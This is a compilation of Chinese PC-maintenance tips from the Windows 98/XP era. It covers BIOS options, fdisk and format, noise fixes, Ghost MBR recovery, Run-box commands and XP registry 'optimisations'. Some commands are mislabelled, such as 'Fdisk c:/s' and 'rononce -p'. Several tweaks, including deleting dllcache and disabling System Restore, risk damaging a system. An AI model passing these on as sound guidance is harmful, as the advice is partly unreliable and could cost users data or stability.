设定显示器、显示卡以及硬盘是否开启省电模式，可设定成Standby、Suspend以及Off(即不进入省电模式)。　　Video Power Down Mode: 设定显示器在省电模式下的状态 :Disable: 不设定 ；Stand By: 待命模式；Suspend: 沉睡模式。　　Hard Disk Power Down Mode: 设定硬盘在省电模式下的状态。（同上）　　Standby Timeout/Suspend Timeout: 本选项可设定系统在闲置几分钟后，依序进入Standby Mode/Suspend Mode等省电模式。　　Display Activity: 当系统进入Standby Mode时，显示器是否进入省电模示，Ingroe:忽略不管；Monitor:开启。　　Monitor Serial Port/Paralell Port/Pri－HDD/Sec－ HDD/VGA /Audio/Floppy: 当系统进入省电模式后，是否监视串并行口、主从硬盘、显示卡、声卡、软驱的动作。Yes:监视，即各设备如有动作，则系统恢复到全速工作模式；No:不监视。　　Power Button Override: 是否开启电源开关功能。　　Power Button Function: 此选项是设定当使用ATX电源时，电源按扭（SUS－SW）的作用。 Soft Off: 按一次就进入Suspend Mode，再按一次就恢复运行。Green: 　　按第一下便是开机，关机时要按住4秒。　　Ring resume From Soft Off:是否开启Modem唤醒功能。　　RTC Alarm Resume From Soft Off: 是否设定BIOS 定时开机功能。PCI/PnP Setup窗口　　此选项可设定即插即用(PnP)功能。　　OnBoard USB: 是否开启芯片组中的USB功能。　　Plug and Play Aware OS: 如你的操作系统(OS)具有PnP功能(如 Win95)，此项应选Yes；若不是，则选No。如某些PnP卡无法检测到时，建议设成No。　　PCI Latency Timer: 此选项可设定PCI时钟的延迟时序。　　Offboard PCI IDE Card: 如使用了其它的PCI IDE卡，则此项必须设定，这要视你的PCI IDE卡是插在哪个Slot(1－4)上而定，并设定以下各IDE IRQ 值。Slot5、6以及Hardwared为保留选项。　　Offboard PCI IDE Primary IRQ: 设定PCI IDE卡上IDE 0所要占用的INT＃，一般都是设定成INT＃A。　　Offboard PCI IDE Secondary IRQ: 设定PCI IDE卡上IDE 1所要占用的INT＃，一般都是设定成 INT＃B。　　Assign IRQ to PCI VGA Card: 指定一个IRQ给VGA卡使用，一般不用指定IRQ给VGA卡。　　IRQ 3、4、5、7、9、10、11、12、14、15/DMA Channel 0、1、3、5、6、7:本选项是设定各IRQ/DMA是否让PnP卡自动配置，若设定成PCI/PnP，则BIOS检测到PnP卡时，会挑选你所有设成PCI/PnP状态的其中一个IRQ/DMA来使用；反之，若设成ISA/EISA，则BIOS将不会自动配置。一般设为PCI/PnP。Peripheral Setup（外围设备设定）窗口　　Onboard FDC: 是否启用主板上的软驱接口。　　Onboard Serial Port 1: 选择串行口1（COM1）的地址，一般设成Auto。　　Serial Port1 IRQ: 此选项可设定串行口1的IRQ，建议设成4。　　Onboard Serial Port 2: 选择串行口2的地址， 一般设成Auto。　　Serial Port2 Mode : 若设成 Normal，为一般接鼠标、Modem用；如有红外线装置(IrDA)，则建议设成IrDA ASKIR。　　Serial Port2 IRQ: 此选项可设定串行口2的IRQ，建议设成3。　　Onboard Parallel Port: 选择并行口的地址。　　Onboard Parallel Mode: 选择并行口的传输模式(ECP/EPP/Normal)。默认为标准模式(Normal)。　　Parallel Mode IRQ : 设定并行口IRQ，建议设定成7。　　EPP Version: 设定EPP Mode为1.7或1.9 版。　　Onboard IDE : 是否启用主板上的PCI IDE0、IDE1接口。如果采用外接的IDE卡，则此项必须改成Disable，反之则设成Both。此选项若设错，将会导致硬盘、光驱等IDE设备检测不到。Security(安全）窗口　　User:允许User(用户)设定密码，输入密码后，必须再输入一次确认。　　Anti－Virus：此选项开启后，可防止病毒入侵硬盘的Boot区以及BIOS。Utility (实用)窗口　　Detect IDE：此功能可以自动检测所有接在IDE0及IDE1上的设备，包括硬盘、CD－ROM、LS－120等，且会自动判断其PIO模式，以及LBA/Normal/Large模式，一次即可检测完毕。

分区及格式化：
一、什么时需分区
A、新硬盘 B、分区不合理 C、感染病毒
二、分区工具：
fdisk.exe dm partition magic win2000\xp
三、fdisk的分区的过程，在DOS下运行
1 A:>FDISK
Y：每个区大小无限制
N：每个区最大2GB
2 主界面
(1)建立分区 包括建立主DOS分区、建立扩展分区、在扩展分区中建立逻辑分区。
(2)激活分区
(3)删除分区 包括删除主DOS分区、删除扩展分区、在扩展分区中删除逻辑分区、删除非DOS分区。
(4)显示分区
(5)更换不同硬盘
3 注意事项：
A、设置活动分区：活动分区可用于引导操作系统，只能激活基本DOS分区
B、扩展DOS分区：只安装DOS和WINDOWS时必须把基本分区外所有空间分给扩展DOS分区，否则会有一部分硬盘空间成为非DOS分区，不能由DOS和WINDOWS使用
C、完成后重启，重启时分区信息被纪录到主引导扇区
D、安装多个硬盘时会出现第5项，分区后盘符排列：先排基本DOS分区，再排逻辑分区

格式化

1、格式化分低级格式化和高级格式化
低级格式化：建立磁道、扇区 （DM、BIOS设置中选择）
高级格式化：A、检测磁道、文件数据等信息
B、给分区编号、建立文件分配表、目录表
2、高级格式化：FORMAT命令
A:>FORMAT C：／S (格式化C盘并传系统文件IO.SYS、MSDOS.SYS、COMMAND.COM到目标盘)
/S-----传递系统
/Q----快速格式化，不检测磁盘，新分区不能用


拥有一台安静的电脑

《一键清理系统垃圾》

拥有一台安静的电脑

    一、冬天里的嗡嗡声
    前几天真是非常的寒冷，不知你是否发现，你平时一向安静的电脑现在开机时却发出了难听的嗡嗡声，但过一会儿，这种声音又会渐渐消失。是什么原因呢？其实那多半是你的CPU风扇惹的祸。在气温太低的情况下，风扇的润滑油有些凝固，外加灰尘和缺油的综合影响，使得风扇旋转困难，于是产生了这种声音，不仅难听，而且有可能因润滑不良导致风扇堵转，烧坏风扇线圈，从而威胁到CPU，笔者的CPU就差点因此而丧生。
    在机器开了一段时间之后，风扇慢慢变热，润滑油的黏度渐渐变小，风扇又得到良好润滑，于是这种声音也就自然消失了。
    原因是知道了，怎么解决这个问题呢？其实动手能力稍强一点的人都能轻易解决这个问题，那就是给风扇做一做清洁，并且加油（关于风扇的拆卸，清洁方法请参看《电脑报》2000年第46期《散热风扇的维修》）。只是要注意一下用油：如果你能搞得到机油那最好了，工厂里有的专用润滑油抗冻性能非常好，均匀地涂在轴承上，注意适量。
    终于可以过一个安静的冬天了！
        二、亲爱的，请别再震动
    为了超频，你是否有一个风力很大，散热效果很好，同时震动也很大的风扇？散热效果是好了，可是震动也是一个问题呀，一来发出噪音令人烦躁；二来由于震动大，对其它部件的稳定工作也造成了不良影响，甚至长期使用会损坏硬件。既然我们是DIYer，就一定有一条解决之道！
    思路：有人曾经用橡皮筋把硬盘吊了起来以减少噪音，对此笔者不敢苟同，因为硬盘毕竟太贵重，要是没固定好，一不小心碰坏了可就亏大了，再说硬盘因震动引起的噪音也不算太大。但风扇可不一样，它轻巧而不易损坏，个头小也不会碰到其他东西。于是说干就干，我把风扇从CPU散热片上卸了下来，用弹性一般的细绳穿过四个角上的螺钉孔，把风扇吊起来（我不主张用橡皮筋，它弹性太好以至于风扇动得太厉害影响散热效果）。注意方位要调整好，对着CPU吹。对显卡等设备也可如法炮制，另找一个风扇并且调整好方位，使之可以兼顾显卡，Modem等设备，这样对整个机箱内部也起到了一个良好的空气流动作用，把整个机箱的温度全部降下来，从此电脑不再发烧，又没有震动烦恼！
        三、没让你说话时，请保持安静
    你是否也跟笔者一样，饱受音箱噪音的折磨。来，让我们一起来分析一下原因：
    双击系统托盘中的喇叭符号，打开Windows“音量”属性，把CD-ROM选项下的“静音”打上钩，看噪音是否消失，如果是，那么则是光驱通过音频线与声卡的连接带来了噪音，一般是由于有的光驱对干扰的屏蔽不好造成的，那么你如果不经常听CD音乐的话可以让CD音乐静音，而且即使静音了，用超级解霸还是可以播放CD音乐。
    经过以上动作，笔者的音箱安静了少许，看来还有部分问题没解决。这时你拔掉你音箱与声卡的连线，看是否噪音消失：若消失，则说明声卡抗干扰能力弱，有噪音信号输出，或者是连线过长而且抗干扰能力比较差。对于前者，一般来说是没有办法的，除非你改换声卡的滤波电容等；但对于后者，条件较好的可以考虑更换抗干扰能力较强的音频线，若不想更换，也可以减小连线长度，并且调整方位，使音频线尽量远离电脑的其它连线，可以减少干扰。另外良好的接地也可以减少干扰源。
    这么一摆弄，效果还真好了不少。如果拔掉音频线噪音还是存在的话，那只能说明你的音箱本身品质有问题，或者是电源问题，换一个正规一点的插线板试试吧。
    总之笔者的音箱经过这么小小的动手，烦人的噪音基本上消失了。
        后记：
    噪音解决了，散热更好了，震动没有了，只是这么小小动手的成果。其实DIY并不复杂，并不需要多么高超的技艺。只要你勤于思考，勇于动手，只需要付出很小的代价就可以解决一些看似复杂的问题，愿以此小文，与大家共勉之。

作者：岑亮


用Ghost还原主引导记录

《一键清理系统垃圾》

用Ghost还原主引导记录

    笔者的机器配置为：PⅢ 600MHz处理器、杂牌VIA 82C69x主板、128MB内存、迈拓硬盘、S3 Savage4显卡。
        近日，笔者给Windows98安装了PowerQuest的BootMagic，想用于机器的多重启动。后由于笔者的疏忽，在没有正常地卸载BootMagic之前，就用其它盘中的原C盘的Ghost文件进行了还原。结果系统每次启动时，都会出现提示：“Can not found system　Press any key start activable partition”。此时，按任意键可启动原来的Windows98系统。
        虽然系统可以启动，但每次都要按任意键，那总不是办法吧。我想：如果用Fdisk重新分区后再安装Windows98总不该有原来的问题吧？于是，马上用Windows98启动盘启动机器，运行Fdisk，将硬盘分成C、D、E三个分区，同时将C区设置成活动分区。然后，重新用该启动盘启动机器并进行格式化。对D、E分区直接进行格式化就可以了；但为了使C盘能够引导系统，我使用了Fdisk c:/s命令进行格式化。
        再次重新启动，准备从硬盘直接启动计算机。本以为一切顺利，结果当系统出现“ Verifying DMI Pool Data.……”信息后，机器就毫无反应了。硬盘没连接好？进入CMOS进行IDE检测，结果能找到硬盘。再次进行分区格式化，系统故障依旧。系统能够找到硬盘并进行分区格式化，也能够通过自检，那问题肯定是出在硬盘本身，难道是MBR（主引导记录）出了问题？听说KV300能够修复这个问题，但我手头上没有，怎么办？
        该死的Ghost!当再次想到Ghost时，突然想到：Ghost既然能够保存和还原分区信息和磁盘信息，那我用其它正常硬盘的磁盘信息来还原这块硬盘，是不是可以修复MBR呢？于是，将故障硬盘拆下并装到其它机器的IDE2接口上，运行Ghost的Disk──Disk，一番硬盘狂响后，还原完成。马上装回原来的机器，重新进行分区格式化，结果奇迹出现了，那久违的c:\>又重新出现在我的眼前。
        经过这一番经历，我总结出了一些经验：
        1.用涉及到分区的一些软件如：BootMagic、PartitionMagic，以及安装多操作系统时，一定要先保存好原有的磁盘和分区信息（使用Ghost），以防MBR（主引导记录）和原有系统遭到破坏。
        2.用Ghost进行备份时，除了要备份原操作系统所在的分区外，还应该备份整个硬盘的信息以防不测。

作者：曾庆富


由Reset键引发的故障

《一键清理系统垃圾》

由Reset键引发的故障

《中国电脑教育报》张宏伟

    我在一家电脑公司做售后服务，一次发现等待解决故障的维修单上问题如下：计算机在正常使用的情况下会突然黑屏，有时在开机时显示器会不亮，且电源风扇正常转动。有过维修经历的人都会知道这种问题是最难搞的，因为不能直接从表面现象找到问题出在哪儿，看来我要亲自出马了。

    带上全部工具和配件来到了客户家，首先详细询问了一下情况，比如出现黑屏是不是因为运行了某个特定的等程序，家里的电源是不是标准等等。得到的答案电源没问题，因为自己已经找专业人员测过；黑屏的发生也是不定时的，有时是根本不亮，有时是在刚开机时，有时是用了一会儿，运气好时用一天也不会出现。由此我断定是因为某个部件接触不良造成的。

    于是先打开机箱把各个板卡重新插拔一遍，开机一切正常，机器很快进入了Windows 98。没想到这么快就解决了，正当客户要称赞我时，故障又出现了。尴尬之余只得用排除法一一尝试，但依然没有找到问题根源。正好此事，我无意的回头发现机箱上的Reset键似乎没有复位，随手碰了一下又弹了回来，原来如此！客户还未反应过来，我就以最快的速度把电脑重新装好，开机进入系统一切正常！而后再也没有发生类似的故障了！

    想不到一个小小的Reset键无法复位，循环重启的状态竟然要折腾我这么多时间，看起来以后一定要多多留意细节问题啊！


由Reset键引发的故障

《一键清理系统垃圾》

由Reset键引发的故障

    我在一家电脑公司做售后服务，一次发现等待解决故障的维修单上问题如下：计算机在正常使用的情况下会突然黑屏，有时在开机时显示器会不亮，且电源风扇正常转动。有过维修经历的人都会知道这种问题是最难搞的，因为不能直接从表面现象找到问题出在哪儿，看来我要亲自出马了。

    带上全部工具和配件来到了客户家，首先详细询问了一下情况，比如出现黑屏是不是因为运行了某个特定的等程序，家里的电源是不是标准等等。得到的答案电源没问题，因为自己已经找专业人员测过；黑屏的发生也是不定时的，有时是根本不亮，有时是在刚开机时，有时是用了一会儿，运气好时用一天也不会出现。由此我断定是因为某个部件接触不良造成的。

    于是先打开机箱把各个板卡重新插拔一遍，开机一切正常，机器很快进入了Windows 98。没想到这么快就解决了，正当客户要称赞我时，故障又出现了。尴尬之余只得用排除法一一尝试，但依然没有找到问题根源。正好此事，我无意的回头发现机箱上的Reset键似乎没有复位，随手碰了一下又弹了回来，原来如此！客户还未反应过来，我就以最快的速度把电脑重新装好，开机进入系统一切正常！而后再也没有发生类似的故障了！

    想不到一个小小的Reset键无法复位，循环重启的状态竟然要折腾我这么多时间，看起来以后一定要多多留意细节问题啊！


运行命令

《一键清理系统垃圾》

运行命令

winver检查Windows版本
dxdiag检查DirectX信息
mem.exe显示内存使用情况
Sndvol32音量控制程序
sfc.exe系统文件检查器
gpedit.msc 组策略
regedit.exe 注册表
Msconfig.exe 系统配置实用程序
cmd.exe CMD命令提示符
chkdsk.exe Chkdsk磁盘检查
mem.exe显示内存使用情况
gpedit.msc 组策略
regedit.exe 注册表
Msconfig.exe 系统配置实用程序
cmd.exe CMD命令提示符
services.msc 服务
lusrmgr.msc 本地账户管理
drwtsn32 系统医生
cleanmgr 整理
iexpress 木马捆绑工具，系统自带
mmc 控制台
dcpromo 活动目录安装
ntbackup 系统备份和还原
rononce -p 15秒关机
taskmgr 任务管理器
conf 启动netmeeting
devmgmt.msc 设备管理器
diskmgmt.msc NT的磁盘管理器
compmgmt.msc 计算机管理
winchat 局域网聊天
dvdplay DVD播放器
mplayer2 简易widnows media player
mspaint 画图板
nslookup 网络管理的工具
syskey 系统加密，一旦加密就不能解开，保护windows xp系统的双重密码
wupdmgr WIDNOWS UPDATE
Clipbrd 剪贴板查看器
Odbcad32 ODBC数据源管理器
Nslookup IP地址侦测器

开始 运行 命令 集锦

winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构(WMI)
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板
winmsd---------系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天
mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器
net stop messenger-----停止信使服务
net start messenger----开始信使服务
notepad--------打开记事本
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕“讲述人”
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an----(TC)命令检查接口
syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码
services.msc---本地服务设置
Sndvol32-------音量控制程序
sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护
tsshutdn-------60秒倒计时关机命令
tourstart------xp简介（安装完成后出现的漫游xp程序）
taskmgr--------任务管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打开资源管理器
packager-------对象包装程序
perfmon.msc----计算机性能监测程序
progman--------程序管理器
regedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
regsvr32 /u *.dll----停止dll文件运行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------SQL SERVER 客户端网络实用程序
Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------垃圾整理
ciadv.msc------索引服务程序
osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
oobe/msoobe /a----检查XP是否激活 lusrmgr.msc----本机用户和组 logoff---------注销命令
iexpress-------木马捆绑工具，系统自带
Nslookup-------IP地址侦测器
fsmgmt.msc-----共享文件夹管理器
utilman--------辅助工具管理器
gpedit.msc-----组策略


找回“显示桌面”按钮

《一键清理系统垃圾》

找回“显示桌面”按钮

用记事本新建一个文本文件，把下面这段内容复制进去，保存时把类型选为“所有文件”，把这个文件保存为：“Show Desktop.scf”，再把图标拖到工具栏上，“显示桌面”就回来了。

[Shell]
    Command＝2
    IconFile＝explorer.exe,3
    [Taskbar]
    Command=ToggleDesktop

另：第三行应该是代表图标的位置，把数字“3”换成“4”，刷新，果然图标跟着变了！再换成“5”，又一个！哈，这么一来，无意中竟被我发现了更改“显示桌面”图标的方法，只要在“IconFile=”后输入你所中意的图标路径就可以了。
其实，在Windows9X系统下，如果出现误删除“显示桌面”的情况，只需在搜索里键入“*.scf”就可以找到“显示桌面”的图标。而在WindowsXP下，只能通过复制或写程序了。


找回丢失的桌面图标透明效果

《一键清理系统垃圾》

找回丢失的桌面图标透明效果

    问：我使用的是Windows XP操作系统，因为使用了WinMatrix XP这个软件后，桌面图标的透明效果就没了。请问要怎样设置才能找回原本美丽的桌面？

    答：由于WinMatrix XP软件自动激活了你的动态桌面(Active Desktop)，所以图标透明效果就没有了。在“运行”中输入“gpedit.msc”，打开组策略；在“用户配置→管理模板→桌面→Active Desktop”中，点活动桌面属性选定“未被配置”，点禁用活动桌面属性选定“已禁用”；最后打开控制面板，在经典视图中打开系统，在“性能→高级选项→性能→视觉效果”里选取“在桌面上为图标标签使用阴影”即可(默认情况下，最后一步可忽略)。


重装系统失败的原因

《一键清理系统垃圾》

重装系统失败的原因

                  二:系统优化(注:优化前先用ghost备份以免出现问题
                  Windows XP 的优化 (打开注册表,运行中输入"Regedit"，

                  1) 减少开机滚动条时间

                      每次启动Windows
                  XP，蓝色的滚动条都要走上好多次，其实这里我们也可以把它的滚动时间减少，以加快启动速度。打开注册表编辑器，找到
                  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory
                  Management\PrefetchParameters，在右边找到EnablePrefetcher主键，把它的默认值3改为1，这样滚动条滚动的时间就会减少。

                  2) 加快开机速度

                      在XP中关机时，系统会发送消息到运行程序和远程服务器，告诉它们系统要关闭，并等待接到回应后系统才开始关机。
                  加快开机速度，可以先设置自动结束任务，首先找到:
                  HKEY_CURRENT_USER\Control
                  Panel\Desktop，把AutoEndTasks的键值设置为1；然后在该分支下有个"HungAppTimeout"，把它的值改为"4000（或更少），默认为50000；
                  最后再找到HKEY_LOCAL_MACHINE\
                  System\CurrentControlSet\Control\，同样把WaitToKillServiceTimeout设置为"4000"；通过这样设置关机速度明显快了不少。

                  3) 关掉调试器Dr.Watson；

                  Dr.Watson
                  是自带的系统维护工具，它会在程序加载失败或崩溃时显示。运行drwtsn32，把除了"转储全部线程上下文"之外的全都去掉。否则一旦有程序出错，硬盘会响很久，而且会占用很多空间。如果你以前遇到过这种情况，请查找user.dmp文件并删掉，可能会省掉几十M的空间。这是出错程序的现场，对我们没用。然后打开注册表，找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
                  NTCurrentVersion\AeDebug子键分支，双击在它下面的Auto键值名称，将其"数值数据"改为0，
                  最后按F5刷新使设置生效，这样就彻底来取消它的运行了。另外蓝屏时出现的memory.dmp也可删掉。
                  可在我的电脑/属性中关掉BSOD时的DUMP

                  4) 关闭"系统还原"：

                  鼠标右健单击桌面上的"我的电脑"，选择"属性"，找到"系统还原"，如果你不是老噼里啪啦安装一些软件，你也可以去掉，这样可以节省好多空间。
                  5) 关闭"休眠支持"：
                  因为休眠功能占的硬碟空间蛮大的,所以关闭比较好,
                  控制台-->电源选项-->休眠(不要打勾)
                  6) MsConfig。
                  大多数朋友都应该熟识MsConfig了，这是一个系统内置的Windows设置工具。点击开始菜单，选择"运行"，然后在录入框中敲入
                  "msconfig"回车。我们要动手脚的是（启动）选项卡，点击它，这个选项卡中显示了Windows启动时运行的所有程序。这里没有一个程序对
                  Windows来说是生死悠关的，所以放心大胆地把不要的去掉。把部分勾勾去掉之后，Windows启动会快些，同时空闲的系统资源也会多出一些。
                  7) 压缩文件夹
                      这是一个相当好的优化，WindowsXP内置了对.ZIP文件的支持，我们可以把zip文件当成文件夹浏览。不过，系统要使用部分资源来实现这一功能，因此禁用这一功能可以提升系统性能。实现方法非常简单，只需取消zipfldr.dll的注册就可以了，点击开始--运行，敲入：regsvr32
                  /u zipfldr.dll。然后回车即可。
                  8) 不加载DLL文件*
                      浏览器在使用之后往往会有部分DLL文件在内存中缓存好长一段时间，相当大一部分内存会被不用的DLL文件点用。为了防止这种事情发生，找到注册表如下位置：HKEY_LOCAL_MACHINE\
                  SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer接下来建立一个名为
                  AlwaysUnloadDLL，值为1的双字节值。如果想要去除这项优化，只需把该键值设为0（也可以干脆把键删掉）。注意：该项优化要在
                  Windows重新启动后才生效。
                  9) 关闭错误回报

                  控制台---->系统---->进阶---->右下角--->错误报告---->关闭

                  10) 清除共享文件夹

                      WindowsXP操作系统一个比较不友好的用户界面是在"我的电脑"窗口上半部分显示所有共享的文件夹，如果用户设置的共享文件夹较多，每当打开"我的电脑"窗口时，就会列有很多共享文件夹信息。如何删除这些信息显示呢?使用注册表编辑器，"HKEY_LOCAL_MACHINE\SOFTWARE\
                  Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders"，在该主键下有一个名为{59031a47-3f72-44a7-89c5-5595fe6b30ee}的副键，删除该副键便可清除那些共享文件夹信息。上述修改无需重新启动便可生效。
                  11) 去除共享
                      [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
                      "AutoShareServer"=dword:00000000
                      "AutoSharewks"=dword:00000000
                  12) 去除IPC$管理
                      [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
                      "restrictanonymous"=dword:00000001
                  13) 有关AVI文件预览功能的关闭或开启（两个方法任选一个即可，我自己是用修改注册表的方法）
                      1、删除注册表中的下述键值即可关闭该功能。最好备份一下该键值，以便今后恢复预览功能，
                  [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{87D62D94-71B3-4b9a-9489-5FE6850DC73E}\InProcServer32]
                      2、也可以将Shmedia.dll反注册，打开命令行窗口，
                  执行以下指令："RegSVR32 /U Shmedia.dll"。
                  恢复预览功能指令："RegSVR32 Shmedia.dll"。

                  14) IE多线程下载

                  打开注册表
                  "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion"，新建两个
                  REG_DWORD值"MaxConnectionsPerServer"和"MaxConnectionsPer1_0Server"，然后赋值你希望的数值，重新启动Windows之后修改才能生效。我自己赋值为"10"。
                  15) 设置CPU：
                  WindowsXP无法自动检测处理器的二级缓存容量，需要我们自己在注册表中手动设置，首先打开注册表(运行中输入"Regedit"，
                  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session
                  Manager\Memory
                  Management\，选择"SecondLevelDataCache"，根据自己所用的处理器设置即可，例如
                  PIIICoppermine/P4Willamette是"256"，AthlonXP是"384"，P4Northwood是"512"
                  16) XP系统所在分区减肥方法。
                  1.删除系统文件备份sfc.exe /purgecache（一般用户是不怎么用的）
                  2.删除驱动备份windows\drivercache\i386目录下的Driver.cab文件（73mb）
                  3.取消系统还原（总体来说系统还原功能还是不错的，建议除了xp安装的那个盘使用，其它盘都别用，如果哪一天硬盘的空间不够了，可以通过系统清理程序删除一些比较早的还原点）
                  4.删除帮助文件（减掉40多mb）（使用中文汉化包的文件大小为92兆，刚开始使用xp的同志最好别删）
                  最要减肥的地方当然是帮助文档，一个帮助文档占着80~90兆的地盘。你可以到它的“巢穴”(系统分区＼你的XP安装目录＼help)把它扫地出门。除此之外，你也可以去掉安装时的系统文件备份。这些备份在“系统分区＼你的XP安装目录＼System32＼Dllcache”文件夹下面(去除该文件夹的隐藏属性可看见，备份的目的是系统能够自动、或者让你通过在命令行下打SFC命令手动恢复。当然这样会占用大量的硬盘空间，如果你不想使用这个功能，就可以在命令提示符下输入sfc
                  /purgecache
                  5.删掉\WINDOWS\system32\dllcache下文件（减去200--300mb）。（这是备用的dll文件，只要你拷贝了安装文件，完全可以这样做。既然这样删你没话说）
                  6、把我的文档、IE的临时文件夹(Temp)都转到其他盘（分区）。（同时对系统的速度，和硬盘都有好处，如果使用的是双系统，最好把两个系统的IE临时文件都放在同一个文件夹，这样既加快速度有节省空间）
                  7、把虚拟内存也转到其他盘。（就是将这些东西和平时临时下载文件放在一个不大的分区里，这样也方便整理硬盘）
                  8、将应用软件装在其他盘（这对重装系统也有好处，可以省很多事）。
                  9、如用ntfs装xp,本身就节省地盘。
                  10、删除不需要的输入法

                  如何安装系统3

                  如何将输入法彻底删除

                  （1）我们在文字和语言服务窗口删除的我们不需要的输入法，其实并没有真正从硬盘删除，到控制面板→区域和语言选项→语言选项卡中，将“为东亚语言安装文件”前面的勾去掉，点确定依提示删除不要的语言，重新启动再到windowsxp的安装目录下的\ime\文件夹下直接删除chtime、imjp8_1、
                  imkr6_1三个目录即可，分别是繁体中文、日文、韩文，如果你只用一种输入法那恭喜你，又可以节约80MB硬盘空间了。（注：管理员在安全模式下可以删除）
                  （2）删除不需要的输入法
                  鼠标右击桌面右下角的输入法图标，可以删去不要的输入法，这谁都知道，可你看看硬盘空间并没有减少，这是为什么呢？原来Windows并没有删除掉那些输入法的相关文件，还得我们自己手动删除。以下是Windows自带的输入法的相关文件列表。
                  全拼：Winpy.ime、Winpy.mb、Winpy.hlp、Winpy.cnt。
                  双拼：Winsp.ime、Winsp.mb、Winsp.hlp、Winsp.cnt。
                  微拼：Pintllime.dll、Pintlgab.imd、Pintlgai.imd、Pintlgb.imd、Pintlgd.imd、
                  Pintlgdx.imd、
                  Pintlgie.imd、Pintlgnt.cnt、Pintlgnt.hlp、Pintlgnt.i96、
                  Pintlgnt.ime、Pintlgrb.imd、
                  Pintlgri.imd、Pintlgs.imd、Pintlgsi.imd、Pintlgsx.imd、Pintlgu.imd、Pintlguc..imd、Pintlphr.exe。
                  智能ABC：Winabc.cwd、Abcsda.dll、Abcwin.exe、Winabc.ime、Winabc.ovl、tmmr.rem、user.rem、
                  Winabc.hlp、Winabc.cnt。
                  郑码：Winzm.ime、Winzm.mb、Winzm.hlp、Winzm.cnt。
                  内码输入法：Wingb.mb、Wingb.hlp、Wingb.cnt。
                  表形码：Winbx.mb，Winbx.ime，Winbx.hlp，Winbx.cnt。
                  11：删除多余的键盘布局
                      Windows试图成为世界的宠儿，因此其键盘布局适合于各国各类人的使用习惯。打开注册表编辑器，依次展开HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control
                  \KeyboardLayouts
                  分支，我们可以看到该分支下保存了西班牙语(传统、丹麦语、德语(标准)等多种键盘布局，如果你用不到这些语言的键盘布局，完全可以直接删除这些子键。
                  （注： 美国英语不要删）
                  12：删除多余的区域设置
                      与上述键盘布局相类似的还有Windows的区域设置，在注册表编辑器中展开HKEY_LOCAL_MACHINE\System\
                  CurrentControlSet\Control
                  \Nls\Locale分支，简体中文使用者完全可以只保留“00000804”键值，其他可以毫不留情地删除。
                  13:关闭"Internet时间同步"功能
                  浏览器的设置
                      如果启用了同步，你的计算机时钟每周就会和 Internet
                  时间服务器进行一次同步。笔者建议关掉它(一个没多大用的功能)。请依次单击"开始"→"控制面板"→"日期、时间、语言和区域选项"，然后单击"日期和时间"→"Internet时间"
                  14:卸载无用附件
                      Windows
                  XP安装时根本不会问你选择哪个组件，而且用添加/删除程序准备卸载无用组件的时候，发现好些应用程序都没有删除的选项，如何让删除这些你不常用的应用程序呢？你只需到“系统分区＼你的XP安装目录＼inf”文件夹下(注意去除其隐藏属性)，找到一个sysoc.inf文件，双击用记事本打开，然后在替换对话框里输入“，hide”(注意不要少了前面的逗号，也可以把逗号放在后面)，然后全部替换成“空”，然后你再打开“添加/删除”看看，是不是多出很多东西，那还不快删了？
                  Windows XP还有一个从Windows
                  ME那里继承来的特点，就是“系统还原”功能，如果你不想因此而浪费磁盘空间，你可以对它说不，方法是在选择开始→所有程序→附件→系统工具→系统还原，在系统还原界面，单击“系统还原设置”进入“系统还原设置”窗口，清空“在所有驱动器上关闭系统还原”复选框，这样Windows
                  XP就会删除备份的系统还原点，从而归还它所强占的领土。
                  在Windows
                  XP下，是默认启用休眠的，这样你的本次会话的内容就会“挂起到硬盘”，在你的硬盘上就会多出一个hiberfil.sys文件，大小等于你的内存容量，你也可以在控制面板→电源选项→休眠选项卡里将其关闭，以释放空间。
                  15:抵制垃圾文件
                      当然我们也不能一边瘦身一边制造垃圾，所以我们要时刻注意防止Windows
                  XP产生垃圾文件。如说XP默认在系统失败时记录错误事件，并写入调试信息，我们完全可以弃之不用。方法和Windows
                  2000里是一样的，进入“系统属性”→“高级”→“启动和故障恢复”选项卡，清空“将事件写入日志文件”，在“写入调试信息”下拉框里选“无”即可
                  如何安装系统4

                  16： Windows XP Services 详细解释及建议

                  services.msc ,
